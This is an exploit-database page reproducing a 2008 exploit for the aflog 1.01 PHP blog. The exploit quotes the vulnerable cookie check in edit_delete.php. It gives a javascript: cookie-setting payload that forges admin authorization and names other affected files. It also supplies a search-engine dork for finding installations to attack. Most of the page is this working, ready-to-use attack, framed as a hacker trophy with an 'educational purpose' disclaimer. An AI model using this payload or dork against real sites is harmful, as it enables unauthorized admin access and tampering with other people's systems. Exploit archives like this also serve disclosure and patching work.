SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow ExploitAlert Database

Arrow  Topic :

aflog 1.01 Multiple Insecure Cookie Handling Vulnerabilies


Arrow  ExploitAlert : 4999
  SecurityAlert : 4524 (Exploit Details)
  Milw0rm ID : 6818
Arrow  Credit : JosS
Arrow  Date : 28.10.2008

Arrow   Download

Arrow   Plain text version


Arrow  Exploit Code :  

# aflog 1.01 Multiple Insecure Cookie Handling Vulnerabilies
# url: http://www.aflog.org/download.php
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.

vuln file: /edit_delete.php
vuln code:
15: if($_COOKIE['aflog_auth_a']=="O" || $_COOKIE['aflog_auth_a']=="A"){
xx: .. ---> :P
33: }
34: } else {
35: echo "<center><b><img src='img/x.png'> ERROR!</b><br>You do not
have access to this page. You must be Signed In as
36: an Admin.</center><br>";
37: echo "<center><a href='index.php' class='c'>Home</a> | <a
href='login.php?do=form' class='c'>Sign In</a></center>":
38: }

exploit: javascript:document.cookie = "aflog_auth_a=0; path=/";
document.cookie = "aflog_auth_a=A; path=/";
and enters: /edit_delete.php?id=1 --> POST ID!!
---
vuln files:
edit_cat.php
edit_lock.php
edit_form.php
...more?

dork: "powered by aflog"

Hack0wn :D





Arrow  Feedback :

If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)

ADT

Protect your family and valuables with Home Security Systems

Copyright © SecurityReason.com. All Rights Reserved.